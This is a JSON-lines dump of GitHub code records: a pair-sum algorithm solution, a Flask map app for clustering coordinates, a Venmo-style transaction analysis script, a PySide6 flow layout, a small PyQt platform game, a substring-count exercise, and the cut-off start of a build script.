+{"seq_id":"23785591167","text":"def solution(numbers):\n    answer = []\n    length = len(numbers)\n    for i in range(length):\n        for j in range(i+1, length):\n            val = numbers[i] + numbers[j]\n            if val not in answer:\n                answer.append(val)\n    answer.sort()\n    return answer\nprint(solution([2,1,3,4,1]))","repo_name":"leedh2004/2021-Algorithm-PS","sub_path":"programmers/68644.py","file_name":"68644.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"18425516174","text":"from flask import Flask, render_template\nfrom flask_googlemaps import GoogleMaps\nfrom flask_googlemaps import Map\nimport pandas as pd\n\n#data = pd.read_csv(\"Meteorite_Landings.csv\")\ndata = 
pd.read_csv(\"MetSmall.txt\")\n#print(list(data))\nmeteorits = data[['name', 'GeoLocation']]\n#print(meteorits.head())\n\ndef solv(r):\n import math\n import pandas as pd\n import numpy as np\n import matplotlib.pyplot as plt\n #fixed_df = pd.read_csv('data.txt', # path where you downloaded the data file\n # sep='\\t', encoding='latin1',)\n #fixed_df = pd.read_csv('smalldata.txt', # path where you downloaded the data file\n # sep='\\t', encoding='latin1',)\n fixed_df = pd.read_csv('data.txt', # path where you downloaded the data file\n sep='\\t', encoding='latin1',)\n x=fixed_df.iloc[:, 1]\n y=fixed_df.iloc[:, 2]\n mt = fixed_df[['LAT abs','LON abs']]\n\n def dist(a,b):\n R = 6371\n dLat = (b[0] - a[0])*math.pi/180\n dLon = (b[1] - a[1])*math.pi/180\n a = math.sin(dLat / 2) * math.sin(dLat / 2) + math.cos(b[0] * math.pi / 180) * math.cos(a[0] * math.pi / 180) *math.sin(dLon / 2) * math.sin(dLon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = R * c\n return d\n\n\n Matrix_dist = np.zeros((len(x), len(x)))\n\n # matrix of pairwise distances\n\n for i in range(len(x)):\n for j in range(len(x)):\n Matrix_dist[i][j] = dist(mt.iloc[i], mt.iloc[j])\n\n\n class Cluster:\n def __init__(self, x, y):\n self.x = int(x)\n self.y = int(y)\n # self.data = {self.x,self.y}\n self.data = [self.x, self.y]\n\n\n\n from scipy.cluster.hierarchy import dendrogram, linkage\n #r = 3.5\n #Z = linkage(Matrix_dist, method='single')\n #Z = linkage(Matrix_dist, method='average')\n Z = linkage(Matrix_dist, method='ward')\n K = []\n for point in Z:\n if point[2] < r:\n K.append(point)\n size = len(Z) + 1\n count = 0\n vectorOfClusters = []\n for p in K:\n vectorOfClusters.append(Cluster(p[0], p[1]))\n\n indexes_clusters_to_delete = []\n for vec in vectorOfClusters:\n if (vec.x >= size):\n indexes_clusters_to_delete.append(vec.x - size)\n if (vec.y >= size):\n indexes_clusters_to_delete.append(vec.y - size)\n\n for ins in vectorOfClusters:\n if (ins.x >= size and ins.y >= size):\n ins.data = []\n ins.data = vectorOfClusters[ins.x - size].data + vectorOfClusters[ins.y - size].data\n\n if (ins.x >= size and ins.y < size):\n del ins.data[0]\n # the merged-in cluster is referenced by ins.x here (ins.y is a plain point), so index with ins.x - size\n ins.data = ins.data + vectorOfClusters[ins.x - size].data\n\n if (ins.x < size and ins.y >= size):\n del ins.data[1]\n ins.data = ins.data + vectorOfClusters[ins.y - size].data\n\n finalVectorArray = []\n arrOfClu = []\n ind = 0\n for vec in vectorOfClusters:\n if (ind not in indexes_clusters_to_delete):\n #print(vec)\n finalVectorArray.append(vec.data)\n arrOfClu += vec.data\n ind += 1\n\n for i in finalVectorArray:\n print(i)\n\n count = []\n for i in range(len(x)):\n if (i not in arrOfClu):\n count.append(i)\n\n\n\n\n col = 0\n centerClusters = []\n countJ = 0\n sumPoint = [0, 0]\n for j in finalVectorArray:\n print(j)\n X = np.zeros((len(j), 2))\n i = 0\n if i < X.shape[0]:\n for k in j:\n X[i][0] = mt.iloc[k][0]\n X[i][1] = mt.iloc[k][1]\n\n sumPoint[0] += X[i][0]\n sumPoint[1] += X[i][1]\n i += 1\n\n\n\n # print(\"j: {} , Matrix.x : {} , Matrix.y : {}\".format(k,Matrix[j][0],Matrix[j][1]))\n # print(X)\n\n\n centerClusters.append([sumPoint[0] / len(j), sumPoint[1] / len(j)])\n sumPoint[0] = 0\n sumPoint[1] = 0\n\n col += 1\n countJ += 1\n\n print(\"--------------------------\")\n centerClusters = np.array(centerClusters)\n\n print(\"--------------------------\")\n Y = np.zeros((len(count), 2))\n # print(count)\n t = 0\n for s in count:\n Y[t][0] = mt.iloc[s][0]\n Y[t][1] = mt.iloc[s][1]\n #\n t += 1\n print(mt.head())\n\n class Point:\n def __init__(self, x, y, label):\n self.x = x\n self.y = y\n 
self.label = label\n\n\n vectorPoins = []\n lab = 0\n for vec in finalVectorArray:\n for cl in vec:\n print(cl)\n vectorPoins.append(Point(mt.iloc[cl][0], mt.iloc[cl][1], lab))\n lab += 1\n print(\"---\")\n return vectorPoins\n\n#arr = solv()\n\n'''\ndef generate_markers(meteors):\n markers = []\n for idx, row in meteors.iterrows():\n try:\n\n lat, lng = row[1].split(',')\n tmp = {}\n #tmp['icon']= 'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png'\n #tmp['lat']=float(lat[2:])\n #tmp['lng']=float(lng[:-2])\n tmp['lat'] = 50.412244\n tmp['lng'] = 30.389385\n #tmp['infobox']=str(row[0]) + \" \" + \";\".join([lat[2:], lng[:-2]])\n except:\n continue\n #print(tmp)\n markers.append(tmp)\n return markers\n\n'''\n\n\narr = solv(30)\ndef getMatrker():\n markers = []\n #arr = solv()\n ico = ['http://maps.google.com/mapfiles/ms/icons/yellow-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/pink-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/green-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/orange-dot.png',\n 'http://maps.google.com/mapfiles/ms/icons/purple-dot.png'\n ]\n ico = ico*100\n #i = 0\n for a in arr:\n labels = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n tmp = {}\n\n #tmp['icon'] = 'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png'\n\n tmp['icon'] = ico[a.label]\n tmp['infobox'] = \"\"+str(a.label)+\"\"\n #i+=1\n tmp['lat'] = a.x\n tmp['lng'] = a.y\n markers.append(tmp)\n return markers\n\n\n\n\n\n\napp = Flask(__name__, template_folder=\".\")\nGoogleMaps(app)\n\n@app.route(\"/\")\ndef mapview():\n # creating a map in the view\n sndmap = Map(\n identifier=\"sndmap\",\n style=(\n \"height:100%;\"\n \"width:100%;\"\n \"top:0;\"\n \"left:0;\"\n \"position:absolute;\"\n \"z-index:200;\"),\n lat=50.40982,\n lng=30.34238,\n #markers=generate_markers(meteorits),\n markers = getMatrker(),\n zoom = 12\n )\n\n return render_template('example.html', sndmap=sndmap)\n\nif __name__ == \"__main__\":\n #app.run(debug=True)\n app.run()\n","repo_name":"twominutestomidnight/clustering","sub_path":"renderPoints/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12960490475","text":"import json\r\nimport emoji\r\nfrom pprint import pprint\r\nfrom collections import Counter\r\nfrom urllib.parse import urlparse\r\n\r\n## Load file\r\n#load in json'\r\nprint(\"loading in\")\r\nwith open('merged_filebig.json') as f:\r\n data = json.load(f)\r\n\r\nprint(\"json loaded\")\r\n#Get rid of duplicate Transactions\r\nz = [];\r\n\r\nprint(\"appending data\")\r\nfor x in range(len(data)):\r\n if 'error' not in data[x]:\r\n z.append(data[x]['data']);\r\n\r\nnoDupList = [];\r\nfor x in range(len(z)):\r\n for y in range(len(z[x])):\r\n noDupList.append(z[x][y])\r\n \r\nprint(\"now analyze\")\r\n## Remove duplicate transactions\r\nprint(\"removing duplicates\")\r\nnoDupList = [];\r\nfor x in range(len(z)):\r\n \r\n for y in range(len(z[x])):\r\n if z[x][y] not in noDupList:\r\n noDupList.append(z[x][y])\r\n else:\r\n print((x,\"duplicate\"))\r\n\r\n# Scripts for Profile Pictures\r\n#######################################################################\r\n#Get all of the profile picture hosts\r\npicList = [];\r\nnoPicList = [];\r\nu = 0;\r\nfor x in range(len(noDupList)):\r\n if 'picture' in noDupList[x]['transactions'][0]['target']:\r\n picList.append(noDupList[x]['transactions'][0]['target']['picture'])\r\n else:\r\n if 
'redeemable_target' not in noDupList[x]['transactions'][0]['target']:\r\n noPicList.append(noDupList[x]['transactions'][0]['target'])\r\n else:\r\n noPicList.append(noDupList[x]['transactions'][0]['target']['redeemable_target']['type'])\r\n \r\n if 'picture' in noDupList[x][\"actor\"]:\r\n picList.append(noDupList[x][\"actor\"]['picture']);\r\n else:\r\n if 'redeemable_target' not in noDupList[x][\"actor\"]:\r\n noPicList.append(noDupList[x][\"actor\"])\r\n else:\r\n noPicList.append(noDupList[x][\"actor\"]['redeemable_target']['type'])\r\n#Parse out information we don't care about\r\nfor x in range(len(picList)):\r\n\tpicList[x] = urlparse(picList[x]).netloc\r\n\r\nfor x in noPicList:\r\n picList.append(x);\r\n#count each picture host\r\npicHostCount = Counter(picList)\r\n\r\n\r\nprint(picHostCount)\r\n#####################################################################\r\n#count how many payments and how many charges among transactions\r\n\r\npaymentsVsTransactions = [];\r\n\r\nfor x in range(len(noDupList)):\r\n paymentsVsTransactions.append(noDupList[x]['type'])\r\n\r\npVTCount = Counter(paymentsVsTransactions)\r\n\r\nprint(pVTCount)\r\n####################################################################\r\n#find most popular actors\r\nactors = [];\r\nfor x in range(len(noDupList)):\r\n actors.append(noDupList[x]['actor']['username'])\r\n\r\nrankedActors = Counter(actors).most_common(100)\r\nprint(rankedActors)\r\n####################################################################\r\n#find most popular targets\r\ntargets = [];\r\ntu = 0;\r\nfor x in range(len(noDupList)):\r\n if 'username'in noDupList[x]['transactions'][0]['target']:\r\n targets.append(noDupList[x]['transactions'][0]['target']['username'])\r\n else:\r\n if 'redeemable_target' not in noDupList[x]['transactions'][0]['target']:\r\n #print(noDupList[x]['transactions'][0]['target'])\r\n targets.append(noDupList[x]['transactions'][0]['target'])\r\n else:\r\n #print(noDupList[x]['transactions'][0]['target']['redeemable_target'])\r\n targets.append(noDupList[x]['transactions'][0]['target']['redeemable_target']['display_name'])\r\n \r\n\r\nrankedTargets = Counter(targets).most_common(100)\r\nprint(rankedTargets)\r\n####################################################################\r\n###When accounts were created\r\naccountCreationDates = []\r\nfor x in range(len(noDupList)):\r\n if 'date_created' in noDupList[x]['transactions'][0]['target']:\r\n accountCreationDates.append(noDupList[x]['transactions'][0]['target']['date_created'][0:7])\r\n else:\r\n accountCreationDates.append('No date Provided')\r\n accountCreationDates.append(noDupList[x]['actor']['date_created'][0:7])\r\n\r\ncountedDates = Counter(accountCreationDates)\r\n####################################################################\r\n#targetIsBusiness\r\ntargetIsBusiness = []\r\n\r\nfor x in range(len(noDupList)):\r\n if 'is_business' in noDupList[x]['transactions'][0]['target']:\r\n targetIsBusiness.append(noDupList[x]['transactions'][0]['target']['is_business'])\r\n else:\r\n targetIsBusiness.append(False)\r\n\r\ntargetBusinessCount = Counter(targetIsBusiness)\r\nprint(targetBusinessCount.most_common(10))\r\n#####################################################################\r\n#actorIsBusiness\r\nactorIsBusiness = []\r\n\r\nfor x in range(len(noDupList)):\r\n actorIsBusiness.append(noDupList[x]['actor']['is_business'])\r\n\r\nactorBusinessCount = 
Counter(actorIsBusiness)\r\n\r\nprint(actorBusinessCount.most_common(10))\r\n###################################################################\r\n#find most popular emojis overall\r\nallMessages = []\r\nfor x in range(len(noDupList)):\r\n allMessages.append(noDupList[x]['message'])\r\n\r\npopularEmojis = []\r\nfor x in allMessages:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojis.append(character);\r\n\r\ntopHundredEmojis = Counter(popularEmojis).most_common(100) \r\n\r\n#find most popular emojis on different days of week\r\nmessagesOnDate = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-06':\r\n messagesOnDate.append(noDupList[x]['message'])\r\n \r\n####################################################################\r\n#MAYBE? Find most popular words in message\r\npopularWords = []\r\nfor x in allMessages:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWords.append(word)\r\n\r\ntopHundredWords = Counter(popularWords).most_common(100)\r\n#####################################################################\r\n#Information for Sunday\r\nmessagesOnSunday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-18':\r\n messagesOnSunday.append(noDupList[x]['message'])\r\n\r\n#Top words on Sunday\r\npopularWordsSun = []\r\nfor x in messagesOnSunday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsSun.append(word)\r\n\r\ntopHundredWordsSun = Counter(popularWordsSun).most_common(100)\r\n\r\n#top Emojis on Sunday\r\npopularEmojisSun = []\r\nfor x in messagesOnSunday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisSun.append(character);\r\n\r\ntopHundredEmojisSun = Counter(popularEmojisSun).most_common(100)\r\n####################################################################\r\n\r\n#Information for Monday\r\nmessagesOnMonday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-12':\r\n messagesOnMonday.append(noDupList[x]['message'])\r\n\r\n#Top words on Monday\r\npopularWordsMon = []\r\nfor x in messagesOnMonday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsMon.append(word)\r\n\r\ntopHundredWordsMon = Counter(popularWordsMon).most_common(100)\r\n#top Emojis on Monday\r\npopularEmojisMon = []\r\nfor x in messagesOnMonday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisMon.append(character);\r\n\r\ntopHundredEmojisMon = Counter(popularEmojisMon).most_common(100)\r\n################################################################### \r\n#Information for Tuesday\r\nmessagesOnTuesday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-13':\r\n messagesOnTuesday.append(noDupList[x]['message'])\r\n\r\n#Top words on Tuesday\r\npopularWordsTu = []\r\nfor x in messagesOnTuesday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsTu.append(word)\r\n\r\ntopHundredWordsTu = Counter(popularWordsTu).most_common(100)\r\n#top Emojis on Tuesday\r\npopularEmojisTu = []\r\nfor x in messagesOnTuesday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n 
popularEmojisTu.append(character);\r\n\r\ntopHundredEmojisTu = Counter(popularEmojisTu).most_common(100)\r\n##################################################################\r\n#Information for Wednesday\r\nmessagesOnWednesday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-14':\r\n messagesOnWednesday.append(noDupList[x]['message'])\r\n\r\n#Top words on Wed\r\npopularWordsWed = []\r\nfor x in messagesOnWednesday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsWed.append(word)\r\n\r\ntopHundredWordsWed = Counter(popularWordsWed).most_common(100)\r\n#top Emojis on Wed\r\npopularEmojisWed = []\r\nfor x in messagesOnWednesday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisWed.append(character);\r\n\r\ntopHundredEmojisWed = Counter(popularEmojisWed).most_common(100)\r\n##################################################################\r\n#Information for Thursday\r\nmessagesOnThursday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-15':\r\n messagesOnThursday.append(noDupList[x]['message'])\r\n\r\n#Top words on Thur\r\npopularWordsThur = []\r\nfor x in messagesOnThursday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsThur.append(word)\r\n\r\ntopHundredWordsThur = Counter(popularWordsThur).most_common(100)\r\n\r\n#top Emojis on Thur\r\npopularEmojisThur = []\r\nfor x in messagesOnThursday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisThur.append(character);\r\n\r\ntopHundredEmojisThur = Counter(popularEmojisThur).most_common(100)\r\n\r\n##################################################################\r\n#Information for Friday\r\nmessagesOnFriday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-16':\r\n messagesOnFriday.append(noDupList[x]['message'])\r\n\r\n#Top words on Friday\r\npopularWordsFri = []\r\nfor x in messagesOnFriday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsFri.append(word)\r\n\r\ntopHundredWordsFri = Counter(popularWordsFri).most_common(100)\r\n\r\n#top Emojis on Friday\r\npopularEmojisFri = []\r\nfor x in messagesOnFriday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisFri.append(character);\r\n\r\ntopHundredEmojisFri = Counter(popularEmojisFri).most_common(100)\r\n\r\n##################################################################\r\n#Information for Saturday\r\nmessagesOnSaturday = []\r\nfor x in range(len(noDupList)):\r\n if 'updated_time' in noDupList[x]:\r\n \r\n if noDupList[x]['updated_time'][0:10] == '2018-11-17':\r\n messagesOnSaturday.append(noDupList[x]['message'])\r\n\r\n#Top words on Saturday\r\npopularWordsSat = []\r\nfor x in messagesOnSaturday:\r\n split = x.split(\" \")\r\n for word in split:\r\n popularWordsSat.append(word)\r\n\r\ntopHundredWordsSat = Counter(popularWordsSat).most_common(100)\r\n\r\n#top Emojis on Monday\r\npopularEmojisSat = []\r\nfor x in messagesOnSaturday:\r\n separate = list(x)\r\n for character in separate:\r\n if character in emoji.UNICODE_EMOJI:\r\n popularEmojisSat.append(character);\r\n\r\ntopHundredEmojisSat = Counter(popularEmojisSat).most_common(100)\r\n## End Analysis 
Script","repo_name":"meghanmc/cs4980_project","sub_path":"analyze_script.py","file_name":"analyze_script.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6551444423","text":"#----------------------------------------------------------------------\n\n # Libraries\nfrom PySide6.QtWidgets import QSizePolicy, QLayout\nfrom PySide6.QtCore import Qt, QRect, QSize, QPoint\n#----------------------------------------------------------------------\n\n # Class\nclass QFlowLayout(QLayout):\n def __init__(self, parent = None, orientation = Qt.Orientation.Horizontal, spacing = -1):\n super().__init__(parent)\n self.orientation = orientation\n\n self.setContentsMargins(0, 0, 0, 0)\n\n self.setSpacing(spacing)\n\n self._item_list = []\n\n def __del__(self):\n item = self.takeAt(0)\n while item:\n item = self.takeAt(0)\n\n def addItem(self, item):\n self._item_list.append(item)\n\n # def addWidget(self, widget):\n # self.addItem(QWidgetItem(widget))\n\n def count(self):\n return len(self._item_list)\n\n def itemAt(self, index):\n if index >= 0 and index < len(self._item_list):\n return self._item_list[index]\n\n return None\n\n def takeAt(self, index):\n if index >= 0 and index < len(self._item_list):\n return self._item_list.pop(index)\n\n return None\n\n def expandingDirections(self):\n return Qt.Orientation(0)\n\n def hasHeightForWidth(self):\n return self.orientation == Qt.Orientation.Horizontal\n\n def heightForWidth(self, width):\n return self._do_layout(QRect(0, 0, width, 0), True)\n\n def hasWidthForHeight(self):\n return self.orientation == Qt.Orientation.Vertical\n\n def widthForHeight(self, height):\n return self._do_layout(QRect(0, 0, 0, height), True)\n\n def setGeometry(self, rect):\n super().setGeometry(rect)\n self._do_layout(rect, False)\n\n def sizeHint(self):\n return self.minimumSize()\n\n def minimumSize(self):\n size = QSize()\n\n for item in self._item_list:\n size = size.expandedTo(item.minimumSize())\n\n margin, _, _, _ = self.getContentsMargins()\n\n size += QSize(2 * margin, 2 * margin)\n return size\n\n def _do_layout(self, rect, testOnly) -> int:\n x = rect.x()\n y = rect.y()\n line_height = column_width = height_for_width = 0\n\n for item in self._item_list:\n wid = item.widget()\n space_x = self.spacing() + wid.style().layoutSpacing(QSizePolicy.ControlType.PushButton, QSizePolicy.ControlType.PushButton, Qt.Orientation.Horizontal)\n space_y = self.spacing() + wid.style().layoutSpacing(QSizePolicy.ControlType.PushButton, QSizePolicy.ControlType.PushButton, Qt.Orientation.Vertical)\n if self.orientation == Qt.Orientation.Horizontal:\n nextX = x + item.sizeHint().width() + space_x\n if nextX - space_x > rect.right() and line_height > 0:\n x = rect.x()\n y = y + line_height + space_y\n nextX = x + item.sizeHint().width() + space_x\n line_height = 0\n\n if not testOnly:\n item.setGeometry(QRect(QPoint(x, y), item.sizeHint()))\n\n x = nextX\n line_height = max(line_height, item.sizeHint().height())\n else:\n next_y = y + item.sizeHint().height() + space_y\n if next_y - space_y > rect.bottom() and column_width > 0:\n x = x + column_width + space_x\n y = rect.y()\n next_y = y + item.sizeHint().height() + space_y\n column_width = 0\n\n height_for_width += item.sizeHint().height() + space_y\n if not testOnly:\n item.setGeometry(QRect(QPoint(x, y), item.sizeHint()))\n\n y = next_y\n column_width = max(column_width, item.sizeHint().width())\n\n if self.orientation == 
Qt.Orientation.Horizontal:\n return y + line_height - rect.y()\n else:\n return height_for_width - rect.y()\n#----------------------------------------------------------------------\n","repo_name":"Synell/OGE-Next","sub_path":"data/lib/qtUtils/QFlowLayout.py","file_name":"QFlowLayout.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"14992825902","text":"import sys\nimport MainWindow\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QGridLayout, QPushButton, QGroupBox, QVBoxLayout, QLabel, \\\n QDesktopWidget, QGraphicsView, QGraphicsScene, QGraphicsRectItem, QMainWindow, QGraphicsEllipseItem\n\nfrom PyQt5.QtCore import Qt, QRectF\n\n\nclass GameWindow(QMainWindow):\n def __init__(self, parent=None):\n super(GameWindow, self).__init__(parent)\n\n # enables key event handling\n self.setFocusPolicy(Qt.StrongFocus)\n self.keys_pressed = set()\n\n self.size = 32\n self.setWindowTitle('Donkey Kong')\n self.setGeometry(300, 150, 10*self.size + 5, 20*self.size + 5)\n self.is_game_over = False\n\n self.center()\n self.scene = QGraphicsScene(self)\n view = QGraphicsView(self.scene)\n self.setCentralWidget(view)\n\n self.design = [['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'b', 'b', 'l', 'b', 'b', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'l', 'e', 'e', 'e', 'e'],\n ['b', 'b', 'l', 'b', 'b', 'l', 'b', 'b', 'e', 'e'],\n ['e', 'e', 'l', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'l', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'l', 'e', 'e', 'e', 'e', 'e', 'e', 'e'],\n ['e', 'e', 'l', 'b', 'b', 'b', 'b', 'b', 'l', 'b'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'l', 'e'],\n ['b', 'b', 'b', 'b', 'b', 'b', 'b', 'b', 'l', 'b']]\n # e - empty, b - beam, l - ladder\n\n self.drawScene()\n\n self.player = QGraphicsEllipseItem(9*self.size, 19*self.size, self.size, self.size)\n self.player.setBrush(Qt.green)\n self.player_i = 9\n self.player_j = 19\n self.scene.addItem(self.player)\n\n self.show()\n\n # - when key is pressed\n def keyPressEvent(self, event):\n # self.keys_pressed.add(event.key())\n key = event.key()\n\n if key == Qt.Key_A:\n if (self.player_i - 1) > -1:\n if self.design[self.player_j][self.player_i-1] == 'b' or self.design[self.player_j][self.player_i-1] == 'l':\n self.player_i -= 1\n self.player.setX(self.player.x()-32)\n\n if key == Qt.Key_D:\n if (self.player_i + 1) < 10:\n if self.design[self.player_j][self.player_i+1] == 'b' or self.design[self.player_j][self.player_i+1] == 'l':\n self.player_i += 1\n self.player.setX(self.player.x()+32)\n\n if key == Qt.Key_W:\n if (self.player_j - 1) > -1:\n if self.design[self.player_j - 1][self.player_i] == 'l':\n self.player_j -= 1\n self.player.setY(self.player.y()-32)\n\n if key == Qt.Key_S:\n if (self.player_j + 1) < 20:\n if self.design[self.player_j + 1][self.player_i] == 'l':\n self.player_j += 1\n self.player.setY(self.player.y() + 32)\n\n def center(self):\n qr = 
self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def drawScene(self):\n for i in range(20):\n for j in range(10):\n newRect = QGraphicsRectItem(QRectF(j*32, i*32, self.size, self.size))\n if self.design[i][j] == 'e':\n newRect.setBrush(Qt.black)\n elif self.design[i][j] == 'b':\n newRect.setBrush(Qt.red)\n elif self.design[i][j] == 'l':\n newRect.setBrush(Qt.magenta)\n\n self.scene.addItem(newRect)\n\n\nclass MainMenu(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.size = 64\n self.setWindowTitle('Golden Banana')\n self.setGeometry(300, 150, 15 * self.size, 11 * self.size)\n self.center()\n\n # coloring\n self.setAutoFillBackground(True)\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.black)\n self.setPalette(p)\n\n self.widget1 = QPushButton('Single Player')\n self.widget2 = QPushButton('Multiplayer')\n self.widget3 = QPushButton('Exit')\n self.createGridLayout()\n windowLayout = QVBoxLayout()\n windowLayout.addWidget(self.horizontalGroupBox)\n self.setLayout(windowLayout)\n\n self.widget1.clicked.connect(self.on_pushSinglePlayerButton_clicked)\n\n\n self.widget3.clicked.connect(self.on_pushExitButton_clicked)\n\n self.show()\n\n def on_pushExitButton_clicked(self):\n self.close()\n\n def on_pushSinglePlayerButton_clicked(self):\n self.dialog = GameWindow()\n self.dialog.show()\n self.close()\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\n def createGridLayout(self):\n self.horizontalGroupBox = QGroupBox(\"\")\n layout = QGridLayout()\n\n self.widget1.setFixedSize(200, 30)\n self.widget2.setFixedSize(200, 30)\n self.widget3.setFixedSize(200, 30)\n\n layout.addWidget(self.widget1, 5, 0)\n layout.addWidget(self.widget2, 6, 0)\n layout.addWidget(self.widget3, 7, 0)\n layout.addWidget(QLabel(\" \"), 0, 1)\n #layout.addWidget(QLabel(\" \"), 4, 1)\n #layout.addWidget(QLabel(\" \"), 5, 1)\n layout.addWidget(QLabel(\" \"), 6, 1)\n\n self.horizontalGroupBox.setLayout(layout)\n\n\n#if __name__ == '__main__':\n#\n # app = QApplication(sys.argv)\n # ex = MainMenu()\n # sys.exit(app.exec_())\n","repo_name":"n-miletic/DRS2019","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":6489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24242487663","text":"#! 
/usr/bin/python2.5 -tt\n\n# Problem Set 3\n# Name: Anna Liu\n# Collaborators: N/A\n# Time: 00:20:00\n# Date: 09/04/2014\n\n# count the number 'key' in the 'target' string.\n\n\ndef countSubStringMatch(target, key):\n location = count = 0\n while location < len(target):\n i = str.find(target, key, location)\n if i >= 0:\n count += 1\n location = (i + len(key))\n else:\n break\n return count\n\n\ndef countSubStringMatchRecursive(target, key):\n count = 0\n i = str.find(target, key)\n if i >= 0:\n target = target[i+len(key):]\n count += 1 + countSubStringMatchRecursive(target, key)\n return count\n\n","repo_name":"liuouya/MIT_6.00_assignments","sub_path":"ps3a.py","file_name":"ps3a.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42244809630","text":"#!/usr/bin/env python\n## -*- mode: python -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\nimport os\nfrom os.path import join\nimport shutil\nimport tempfile\nimport subprocess\nfrom subprocess import STDOUT\nimport platform\nimport time\nimport glob\n\n\n## Change to the root directory of repository and add our tools/\n## subdirectory to system wide search path for modules.\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, os.path.abspath(join('code-experiments', 'tools')))\n\nfrom amalgamate import amalgamate\nfrom cocoutils import make, run, python, check_output\nfrom cocoutils import copy_file, expand_file, write_file\nfrom cocoutils import git_version, git_revision\n\nCORE_FILES = ['code-experiments/src/profiler/IOHprofiler_random.c',\n 'code-experiments/src/profiler/IOHprofiler_suite.c',\n 'code-experiments/src/profiler/IOHprofiler_observer.c',\n ]\n\n_verbosity = False\n\n################################################################################\n## C\ndef build_c():\n \"\"\" Builds the C source code 